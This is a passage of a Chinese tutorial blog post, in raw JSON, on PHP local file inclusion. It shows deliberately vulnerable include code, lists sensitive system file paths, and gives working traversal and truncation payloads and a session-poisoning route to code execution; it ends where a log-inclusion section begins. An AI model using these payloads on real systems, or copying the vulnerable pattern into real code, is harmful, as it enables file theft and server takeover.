{"id":123,"date":"2022-03-31T15:19:10","date_gmt":"2022-03-31T07:19:10","guid":{"rendered":"http:\/\/47.118.40.97:8082\/?p=123"},"modified":"2023-09-22T14:02:41","modified_gmt":"2023-09-22T06:02:41","slug":"%e6%96%87%e4%bb%b6%e5%8c%85%e5%90%ab","status":"publish","type":"post","link":"http:\/\/danielw.top\/?p=123","title":{"rendered":"\u6587\u4ef6\u5305\u542b"},"content":{"rendered":"<h1>\u6587\u4ef6\u5305\u542b\u7684\u5b9a\u4e49<\/h1>\n<ul>\n<li>\u5982\u679c\u6587\u4ef6\u5305\u542b\u51fd\u6570\u6ca1\u6709\u7ecf\u8fc7\u4e25\u683c\u7684\u8fc7\u6ee4\u6216\u8005\u5b9a\u4e49<br \/>\n\u5e76\u4e14\u53c2\u6570\u53ef\u4ee5\u88ab\u7528\u6237\u63a7\u5236<br \/>\n\u8fd9\u6837\u5c31\u6709\u53ef\u80fd\u5305\u542b\u975e\u9884\u671f\u7684\u6587\u4ef6\u3002<\/li>\n<li>\u5982\u679c\u6587\u4ef6\u4e2d\u5b58\u5728\u6076\u610f\u4ee3\u7801\uff0c\u65e0\u8bba\u6587\u4ef6\u662f\u4ec0\u4e48\u7c7b\u578b<br \/>\n\u6076\u610f\u4ee3\u7801\u90fd\u4f1a\u88ab\u89e3\u6790\u3002<\/li>\n<li>\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u53ef\u80fd\u4f1a\u9020\u6210\u670d\u52a1\u5668\u7684\u7f51\u9875\u88ab\u7be1\u6539\uff0c\u7f51\u7ad9\u88ab\u6302\u9a6c\uff0c\u670d\u52a1\u5668\u88ab\u8fdc\u7a0b\u63a7\u5236\uff0c\u88ab\u5b89\u88c5\u540e\u95e8\u7b49\u5371\u5bb3<\/li>\n<\/ul>\n<h1>\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u5e38\u89c1\u51fd\u6570<\/h1>\n<p>PHP\u6587\u4ef6\u5305\u542b\u51fd\u6570\u6709\u4ee5\u4e0b\u56db\u79cd\uff1a<\/p>\n<ul>\n<li>include<\/li>\n<li>include_once<\/li>\n<li>require<\/li>\n<li>require_once<\/li>\n<\/ul>\n<p><code>require()\/require_once()<\/code>\uff1a\u5982\u679c\u5728\u5305\u542b\u8fc7\u7a0b\u4e2d\u6709\u9519\uff0c\u90a3\u4e48\u76f4\u63a5\u9000\u51fa\uff0c\u4e0d\u6267\u884c\u8fdb\u4e00\u6b65\u64cd\u4f5c\u3002<br \/>\n<code>include()\/include_once()<\/code>: 
\u5982\u679c\u5728\u5305\u542b\u8fc7\u7a0b\u4e2d\u51fa\u9519\uff0c\u53ea\u4f1a\u53d1\u51fa\u8b66\u544a<\/p>\n<p>\u52a0\u4e0a\u540e\u7f00_once\u7684\u4f5c\u7528\uff1a\u5982\u679c\u6587\u4ef6\u5df2\u7ecf\u5305\u542b\u8fc7\u4e86\uff0c\u90a3\u4e48\u4e0d\u4f1a\u518d\u6b21\u5305\u542b<\/p>\n<p>\u5f53\u5229\u7528\u8fd9\u56db\u5927\u6f0f\u6d1e\u51fd\u6570\u5305\u542b\u6587\u4ef6\u7684\u65f6\u5019\uff0c\u4e0d\u8bba\u4ec0\u4e48\u7c7b\u578b\u7684\u6587\u4ef6\uff0c\u90fd\u4f1a\u4f5c\u4e3aPHP\u811a\u672c\u89e3\u6790<\/p>\n<h1>\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u793a\u4f8b\u4ee3\u7801\u5206\u6790<\/h1>\n<p>\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u793a\u4f8b\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-php\">&lt;?php\n    $file=$_GET[&#039;file&#039;];\n    include $file;\n?&gt;<\/code><\/pre>\n<p>\u4e0a\u9762\u7684\u4ee3\u7801\u6ca1\u6709\u5bf9<code>$_GET[&#039;file&#039;]<\/code>\u53c2\u6570\u8fdb\u884c\u4e25\u683c\u7684\u8fc7\u6ee4\uff0c\u76f4\u63a5\u4ee3\u5165\u5230\u4e86include\u4e2d\u53bb\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u4f20\u9012file\u53c2\u6570\u7684\u503c\u6765\u8fbe\u5230\u653b\u51fb\u7684\u76ee\u7684\uff0c\u6bd4\u5982<code>?file=..\/..\/etc\/passwd<\/code>\u6765\u5b9e\u73b0\u7a83\u8bfb\u5bc6\u7801\u6587\u4ef6\u7684\u76ee\u7684<\/p>\n<h1>\u65e0\u9650\u5236\u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e<\/h1>\n<h2>\u5b9a\u4e49\u4ee5\u53ca\u4ee3\u7801\u5b9e\u73b0<\/h2>\n<p>\u65e0\u9650\u5236\u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u662f\u6ca1\u6709\u4e3a\u5305\u542b\u6587\u4ef6\u6307\u5b9a\u7279\u5b9a\u7684\u524d\u7f00\u6216\u8005\u62d3\u5c55\u540d\uff0c\u56e0\u6b64\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u8bfb\u53d6\u64cd\u4f5c\u7cfb\u7edf\u4e2d\u7684\u5176\u4ed6\u6587\u4ef6\uff0c\u6216\u8005\u6267\u884c\u5176\u4ed6\u6587\u4ef6\u4e2d\u7684\u4ee3\u7801<\/p>\n<h2>\u5e38\u89c1\u7684\u654f\u611f\u4fe1\u606f\u8def\u5f84<\/h2>\n<h3>Windows\u4e0b\u5e38\u89c1\u654f\u611f\u6587\u4ef6<\/h3>\n<table>\n<thead>\n<tr
>\n<th style=\"text-align: center;\">\u76ee\u5f55<\/th>\n<th style=\"text-align: center;\">\u5185\u5bb9<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td style=\"text-align: center;\">\\boot.ini<\/td>\n<td style=\"text-align: center;\">\u7cfb\u7edf\u7248\u672c\u4fe1\u606f<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\">\\xxx\\php.ini<\/td>\n<td style=\"text-align: center;\">PHP\u914d\u7f6e\u4fe1\u606f<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\">\\xxx\\my.ini<\/td>\n<td style=\"text-align: center;\">MYSQL\u914d\u7f6e\u4fe1\u606f<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\">\\xxx\\httpd.conf<\/td>\n<td style=\"text-align: center;\">Apache\u914d\u7f6e\u4fe1\u606f<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>Linux\u4e0b\u5e38\u89c1\u654f\u611f\u6587\u4ef6<\/h3>\n<table>\n<thead>\n<tr>\n<th style=\"text-align: center;\">\u76ee\u5f55<\/th>\n<th style=\"text-align: center;\">\u5185\u5bb9<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td style=\"text-align: center;\">\/etc\/passwd<\/td>\n<td style=\"text-align: center;\">Linux\u7cfb\u7edf\u8d26\u53f7\u4fe1\u606f<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\">\/etc\/httpd\/conf\/httpd.conf<\/td>\n<td style=\"text-align: center;\">Apache\u914d\u7f6e\u4fe1\u606f<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\">\/etc\/my.cnf<\/td>\n<td style=\"text-align: center;\">MySQL\u914d\u7f6e\u4fe1\u606f<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\">\/etc\/php.ini<\/td>\n<td style=\"text-align: center;\">PHP\u914d\u7f6e\u4fe1\u606f<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>\u6f0f\u6d1e\u5229\u7528<\/h2>\n<h3>\u65e0\u9650\u5236\u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u793a\u4f8b\u4ee3\u7801<\/h3>\n<pre><code class=\"language-php\">&lt;?php\n    $file=$_GET[&#039;file&#039;];\n    include 
($file);\n?&gt;<\/code><\/pre>\n<h3>\u8bfb\u53d6\u6587\u4ef6\u5185\u5bb9<\/h3>\n<p>\u901a\u8fc7\u76ee\u5f55\u904d\u5386\u53ef\u4ee5\u83b7\u53d6\u7cfb\u7edf\u4e2d\/etc\/passwd\u6587\u4ef6\u7684\u5185\u5bb9\uff0c\u4f7f\u7528\u793a\u4f8b\u5982\u4e0b\uff1a<br \/>\n<code>http:\/\/www.abc.com\/file.php?file=..\/..\/..\/..\/etc\/passwd<\/code><\/p>\n<h3>\u5229\u7528\u65e0\u9650\u5236\u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u6267\u884c\u4ee3\u7801<\/h3>\n<p>\u53ef\u4ee5\u901a\u8fc7\u6587\u4ef6\u5305\u542b\u529f\u80fd\u6267\u884c\u4efb\u610f\u62d3\u5c55\u540d\u7684\u6587\u4ef6\u4e2d\u7684\u4ee3\u7801<br \/>\n\u6bd4\u5982\uff1a<br \/>\n\u5728\u540c\u4e00\u76ee\u5f55\u4e0b\uff0c\u6709\u5982\u4e0b\u540d\u4e3aphpinfo.txt\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-txt\">&lt;?php phpinfo();?&gt;<\/code><\/pre>\n<p>\u5f53\u9875\u9762\u8bbf\u95eeindex.php\u7684\u65f6\u5019\uff0c\u5982\u679c\u8f93\u5165URL\uff1a<br \/>\n<code>http:\/\/.....\/index.php?file=phpinfo.txt<\/code><br \/>\n\u5c31\u4f1a\u8f7b\u800c\u6613\u4e3e\u6267\u884ctxt\u4e2d\u7684phpinfo()\u51fd\u6570\uff0c\u5e76\u56de\u663e\u5185\u5bb9\u3002<\/p>\n<p><strong>\u603b\u7ed3<\/strong>\uff1a\u8fd9\u79cd\u60c5\u51b5\u7684\u5b9e\u73b0\u6761\u4ef6\u662f\uff1a<\/p>\n<ul>\n<li>PHP\u4ee3\u7801\u4e2d\u6709\u76f8\u5173\u7684\u6587\u4ef6\u5305\u542b\u51fd\u6570\uff1a\u6bd4\u5982 include ($file)<\/li>\n<li>\u653b\u51fb\u8005\u80fd\u591f\u5bf9\u5305\u542b\u7684\u53d8\u91cf\u8fdb\u884c\u4f20\u9012\u53c2\u6570\uff1a\u6bd4\u5982 
$file=$_GET['file'];<\/li>\n<\/ul>\n<h1>\u6709\u9650\u5236\u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e<\/h1>\n<p>\u6709\u9650\u5236\u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u662f\u6307\u4ee3\u7801\u4e2d\u4e3a\u5305\u542b\u6587\u4ef6\u6307\u5b9a\u4e86\u7279\u5b9a\u7684\u524d\u7f00\u6216\u8005\u62d3\u5c55\u540d\uff0c\u653b\u51fb\u8005\u5fc5\u987b\u7ed5\u8fc7\u524d\u7f00\u6216\u8005\u62d3\u5c55\u540d\u8fc7\u6ee4\uff0c\u624d\u80fd\u8fbe\u5230\u5229\u7528\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u8bfb\u53d6\u64cd\u4f5c\u3002<\/p>\n<p>\u5e38\u89c1\u7684\u8fc7\u6ee4\u7ed5\u8fc7\u65b9\u5f0f\u6709\u4e09\u79cd\uff1a<\/p>\n<ul>\n<li>%00 \u622a\u65ad\u6587\u4ef6\u5305\u542b<\/li>\n<li>\u8def\u5f84\u957f\u5ea6\u622a\u65ad\u5305\u542b<\/li>\n<li>\u70b9\u53f7\u622a\u65ad\u6587\u4ef6\u5305\u542b<\/li>\n<\/ul>\n<h2>%00\u622a\u65ad\u6587\u4ef6\u5305\u542b<\/h2>\n<h3>\u5229\u7528\u6761\u4ef6<\/h3>\n<p>\u8fd9\u4e2a\u6f0f\u6d1e\u7684\u4f7f\u7528\u5fc5\u987b\u6ee1\u8db3\u5982\u4e0b\u6761\u4ef6<\/p>\n<ul>\n<li>magic_quotes_gpc=off<\/li>\n<li>PHP\u7248\u672c\u4f4e\u4e8e5.3.4<\/li>\n<\/ul>\n<h3><strong>\u793a\u4f8b\u4ee3\u7801<\/strong><\/h3>\n<pre><code class=\"language-php\">&lt;?php\n    $file=$_GET[&#039;file&#039;];\n    include ($file.&quot;.html&quot;);\n?&gt;<\/code><\/pre>\n<h3><strong>\u6d4b\u8bd5\u7ed3\u679c<\/strong><\/h3>\n<p>\u8f93\u5165\u4ee5\u4e0b\u6d4b\u8bd5\u4ee3\u7801\uff1a<\/p>\n<pre><code> 
http:\/\/www.abc.com\/xxx\/file.php?file=..\/..\/..\/..\/..\/..\/boot.ini%00<\/code><\/pre>\n<p>\u901a\u8fc7%00\u622a\u65ad\u4e86\u540e\u9762\u7684html\u62d3\u5c55\u540d\u8fc7\u6ee4\uff0c\u6210\u529f\u8bfb\u53d6\u4e86boot.ini\u7684\u5185\u5bb9<\/p>\n<h2>\u8def\u5f84\u957f\u5ea6\u622a\u65ad\u6587\u4ef6\u5305\u542b<\/h2>\n<p>\u64cd\u4f5c\u7cfb\u7edf\u5b58\u5728\u7740\u6700\u5927\u8def\u5f84\u957f\u5ea6\u7684\u9650\u5236\u3002\u53ef\u4ee5\u8f93\u5165\u8d85\u8fc7\u6700\u5927\u8def\u5f84\u957f\u5ea6\u7684\u76ee\u5f55\uff0c\u8fd9\u6837\u7cfb\u7edf\u5c31\u4f1a\u5c06\u540e\u9762\u7684\u8def\u52b2\u4e22\u5f03\uff0c\u5bfc\u81f4\u62d3\u5c55\u540d\u622a\u65ad<\/p>\n<h3>\u6f0f\u6d1e\u5229\u7528\u6761\u4ef6<\/h3>\n<ul>\n<li>Windows\u4e0b\u6700\u5927\u8def\u5f84\u957f\u5ea6\u4e3a256B<\/li>\n<li>Linux\u4e0b\u6700\u5927\u8def\u5f84\u957f\u5ea6\u4e3a4096B<\/li>\n<\/ul>\n<h3>\u793a\u4f8b\u4ee3\u7801<\/h3>\n<pre><code class=\"language-php\">&lt;?php\n    $file=$_GET[&#039;file&#039;];\n    include ($file.&quot;.html&quot;);\n?&gt;<\/code><\/pre>\n<h3>\u6d4b\u8bd5\u7ed3\u679c<\/h3>\n<p>\u8f93\u5165\u6d4b\u8bd5\u4ee5\u4e0b\u4ee3\u7801\uff1a<\/p>\n<pre><code>http:\/\/www.abc.com\/xxx\/file.php?file=test.txt\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/
.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\
/.\/<\/code><\/pre>\n<p>\u6267\u884c\u540e\u53d1\u73b0\u5df2\u7ecf\u6210\u529f\u622a\u65ad\u4e86\u540e\u9762\u7684\u62d3\u5c55\u540d<\/p>\n<h2>\u70b9\u53f7\u622a\u65ad\u6587\u4ef6\u5305\u542b<\/h2>\n<h3>\u6f0f\u6d1e\u5229\u7528\u6761\u4ef6<\/h3>\n<p>\u70b9\u53f7\u622a\u65ad\u5305\u542b<strong>\u53ea\u4f7f\u7528\u4e0eWindows\u7cfb\u7edf<\/strong>\uff0c\u70b9\u53f7\u7684\u957f\u5ea6\u5927\u4e8e256B\u7684\u65f6\u5019\uff0c\u5c31\u53ef\u4ee5\u9020\u6210\u62d3\u5c55\u540d\u622a\u65ad<\/p>\n<h3>\u793a\u4f8b\u4ee3\u7801<\/h3>\n<pre><code class=\"language-php\">&lt;?php\n    $file=$_GET[&#039;file&#039;];\n    include ($file.&quot;.html&quot;);\n?&gt;<\/code><\/pre>\n<h3>\u6d4b\u8bd5\u7ed3\u679c<\/h3>\n<pre><code>http:\/\/www.abc.com\/xxx\/file.php?file=test.txt....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................<\/code><\/pre>\n<p>\u53d1\u73b0\u5df2\u7ecf\u6210\u529f\u622a\u65ad\u4e86html\u62d3\u5c55\u540d<\/p>\n<h1>Session\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e<\/h1>\n<p>\u5f53\u53ef\u4ee5\u83b7\u53d6session\u6587\u4ef6\u8def\u5f84\u5e76\u4e14session\u6587\u4ef6\u7684\u5185\u5bb9\u53ef\u63a7\u7684\u7684\u65f6\u5019\uff0c\u5c31\u53ef\u4ee5\u901a\u8fc7\u5305\u542bsession\u6587\u4ef6\u8fdb\u884c\u653b\u51fb<\/p>\n<h2>\u5229\u7528\u6761\u4ef6<\/h2>\n<p>session\u6587\u4ef6\u5305\u542b\u7684\u5229\u7528\u6761\u4ef6\u6709\u4e24\u4e2a\uff1a<\/p>\n<ul>\n<li>Session\u7684\u5b58\u50a8\u4f4d\u7f6e\u53ef\u4ee5\u83b7\u53d6<\/li>\n<li>Session\u7684\u5185\u5bb9\u53ef\u63a7<\/li>\n<\/ul>\n<p>\u4e00\u822c\u901a\u8fc7\u4ee5\u4e0b\u4e24\u79cd\u65b9\u5f0f\u83b7\u53d6session\u7684\u5b58\u50a8\u4f4d\u7f6e\uff1a<\/p>\n<ul>\n<li>\u901a\u8fc7phpinfo\u7684\u4fe1\u606f\u83b7\u53d6session\u7684\u5b58\u50a8\u4f4d\u7f6e\u3002<br \/>\n\u901a\u8fc7phpinfo\u7684\u4fe1\u606f\u83b7\u53d6<code>session.save_path<\/code><\/li>\n<li>\u901a\u8fc7\u731c\u6d4b\u9ed8\u8ba4\u7684session\u5b58\u50a8\u4f4d\u7f6e\u8fdb\u884c\u5c1d\u8bd5<br \/>\n\u901a\u5e38Linux\u4e2d\u7684Session\u7684\u9ed8\u8ba4\u5b58\u50a8\u4f4d\u7f6e\u5728<code>\/var\/lib\/php\/session<\/code>\u76ee\u5f55\u4e0b<\/li>\n<\/ul>\n<h2>\u793a\u4f8b\u5206\u6790<\/h2>\n<p>session\u6587\u4ef6\u5305\u542b\u4ee3\u7801\u5982\u4e0b<\/p>\n<pre><code 
class=\"language-php\">session_start();\n$ctfs=$_GET[&#039;ctfs&#039;];\n$_SESSION[&#039;username&#039;]=$ctfs;<\/code><\/pre>\n<p>\u6b64\u4ee3\u7801\u53ef\u4ee5\u901a\u8fc7GET\u578b\u7684ctfs\u53c2\u6570\u4f20\u5165\u3002PHP\u4ee3\u7801\u5c06\u4f1a\u83b7\u53d6\u7684\u503c\u5b58\u5165\u5230Session\u4e2d\u3002<br \/>\n\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528ctfs\u53c2\u6570\u5c06\u6076\u610f\u4ee3\u7801\u5199\u5165\u5230session\u6587\u4ef6\u4e2d\uff0c\u7136\u540e\u518d\u5229\u7528\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u5305\u542b\u6b64session\u6587\u4ef6\uff0c\u5411\u7cfb\u7edf\u4e2d\u4f20\u9012\u6076\u610f\u4ee3\u7801<\/p>\n<h2>\u6f0f\u6d1e\u5206\u6790<\/h2>\n<p>\u4e0a\u9762\u7684\u4ee3\u7801\u6ee1\u8db3Session\u6587\u4ef6\u5305\u542b\u7684\u4e24\u4e2a\u8981\u6c42<\/p>\n<ul>\n<li>PHP\u4ee3\u7801\u5c06\u4f1a\u83b7\u53d6ctfs\u53d8\u91cf\u7684\u503c\u5b58\u5165\u5230session\u4e2d<\/li>\n<li>Session\u7684\u9ed8\u8ba4 \u5b58\u50a8\u4f4d\u7f6e\u662f\/var\/lib\/php\/session\uff08\u4e5f\u5e38\u89c1\u4e8e\/tmp\uff0c\u4ee5session.save_path\u4e3a\u51c6\uff09<\/li>\n<\/ul>\n<p>\u8bbf\u95eeURL\uff1a<code>http:\/\/www.abc.com\/xxx\/session.php?ctfs=a<\/code> \u4f1a\u5728\/var\/lib\/php\/session\u76ee\u5f55\u4e0b\u5c06ctfs\u4f20\u5165\u7684\u503c\u5b58\u50a8\u5230session\u4e2d<br \/>\nSession\u7684\u6587\u4ef6\u540d\u4ee5sess_\u5f00\u5934\uff0c\u540e\u8ddfSessionid\uff0cSessionid\u53ef\u4ee5\u901a\u8fc7\u5f00\u53d1\u8005\u6a21\u5f0f\u83b7\u53d6\uff1a<br \/>\n\u5355\u51fb\u53f3\u952e\u2014\u2014\u68c0\u67e5\u2014\u2014\u5b58\u50a8\u2014\u2014Cookie\u2014\u2014PHPSESSID \u5c31\u53ef\u4ee5\u627e\u5230\u5185\u5bb9<\/p>\n<p>\u5047\u8bbe\u901a\u8fc7\u5f00\u53d1\u8005\u6a21\u5f0f\u83b7\u53d6\u5230\u7684sessionid\u7684\u503c\u4e3ahufh7hsdf392eurh4,\u6240\u4ee5session\u7684\u6587\u4ef6\u540d\u4e3a<code>sess_hufh7hsdf392eurh4<\/code><br 
\/>\n\u5728\/var\/lib\/php\/session\u76ee\u5f55\u4e0b\u67e5\u770b\u6b64\u6587\u4ef6\uff0c\u5185\u5bb9\u4e3a\uff1a<strong>username|s:1:&quot;a&quot;<\/strong><\/p>\n<h2>\u6f0f\u6d1e\u5229\u7528<\/h2>\n<p>\u901a\u8fc7\u4e0a\u9762\u7684\u5206\u6790\uff0c\u53ef\u4ee5\u5f97\u77e5\uff0c\u5411ctfs\u53c2\u6570\u4f20\u5165\u7684\u5185\u5bb9\u4f1a\u5b58\u50a8\u5230session\u6587\u4ef6\u4e2d\u3002<br \/>\n\u5982\u679c\u5b58\u5728\u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\uff0c\u5c31\u53ef\u4ee5\u901a\u8fc7ctfs\u5199\u5165\u6076\u610f\u4ee3\u7801\u5230Session\u6587\u4ef6\u5f53\u4e2d\u53bb\uff0c\u7136\u540e\u901a\u8fc7\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u6267\u884cgetshell<\/p>\n<p>\u4f8b\u5982\uff1a\u8bbf\u95ee\u4ee3\u7801<code>http:\/\/www.abc.com\/xxx\/session.php?ctfs=&lt;?php phpinfo();?&gt;<\/code>\u540e\uff0c\u4f1a\u5728\/var\/lib\/php\/session\u76ee\u5f55\u4e0b\u5c06ctfs\u7684\u503c\u5199\u5165session\u6587\u4ef6<br \/>\nsession\u6587\u4ef6\u7684\u5185\u5bb9\u4e3a\uff1a<code>username|s:18:&quot;&lt;?php 
phpinfo();?&gt;&quot;<\/code>.<\/p>\n<p><strong>\u653b\u51fb\u6b65\u9aa4<\/strong><\/p>\n<ul>\n<li>\u5c06\u6076\u610f\u4ee3\u7801\u5199\u5165session\u6587\u4ef6<\/li>\n<li>\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7PHPinfo\u6216\u8005\u731c\u6d4b\u5230session\u5b58\u653e\u7684\u4f4d\u7f6e<\/li>\n<li>\u901a\u8fc7\u5f00\u53d1\u8005\u6a21\u5f0f\u53ef\u4ee5\u83b7\u5f97\u6587\u4ef6\u540d\u79f0<\/li>\n<li>\u901a\u8fc7\u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u53ef\u4ee5\u89e3\u6790session\u6587\u4ef6\u8fbe\u5230\u653b\u51fb\u7684\u76ee\u7684<\/li>\n<\/ul>\n<p>\u6bd4\u5982\uff1a<code>http:\/\/www.abc.com\/xxx\/file.php?file=..\/..\/var\/lib\/php\/session\/sess_7sdfysdfywy9323cew2<\/code><\/p>\n<h1>\u65e5\u5fd7\u6587\u4ef6\u5305\u542b<\/h1>\n<p>\u670d\u52a1\u5668\u7684\u4e2d\u95f4\u4ef6\uff0cssh\u670d\u52a1\u90fd\u6709\u65e5\u5fd7\u8bb0\u5f55\u7684\u529f\u80fd\u3002\u5982\u679c\u5f00\u542f\u4e86\u65e5\u5fd7\u8bb0\u5f55\u529f\u80fd\uff0c\u7528\u6237\u8bbf\u95ee\u7684\u65e5\u5fd7\u5c31\u4f1a\u5b58\u50a8\u5230\u4e0d\u540c\u670d\u52a1\u7684\u76f8\u5173\u6587\u4ef6\u3002<br 